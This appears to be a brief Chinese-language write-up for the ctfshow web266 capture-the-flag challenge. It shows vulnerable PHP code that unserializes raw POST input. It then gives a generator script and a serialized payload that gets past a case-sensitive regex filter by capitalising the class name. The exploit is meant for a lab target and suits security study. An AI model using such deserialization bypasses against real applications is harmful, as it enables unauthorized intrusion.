ctfshow web266
<?php
highlight_file(__FILE__);
include('flag.php');
$cs = file_get_contents('php://input');
class ctfshow{
public $username='xxxxxx';
public $password='xxxxxx';
public function __construct($u,$p){
$this->username=$u;
$this->password=$p;
}
public function login(){
return $this->username===$this->password;
}
public function __toString(){
return $this->username;
}
public function __destruct(){
global $flag;
echo $flag;
}
}
$ctfshowo=@unserialize($cs);
if(preg_match('/ctfshow/', $cs)){
throw new Exception("Error $ctfshowo",1);
}
?>本题利用的是php的类目和方法名不缺分大小写特性(变量名敏感),利用大写类名绕过preg_match检查。
但是本题也有一个坑点,payload不能再urlencode,因为是通过php://input提交,并不会在后台进行urldecode,如果换作get提交则可用urlencode后再提交
<?php
class Ctfshow{
public $username='xxxxxx';
public $password='xxxxxx';
}
$a =new Ctfshow();
//echo urlencode(serialize($a));
echo serialize($a);
?>payload:
O:7:"Ctfshow":2:{s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";}
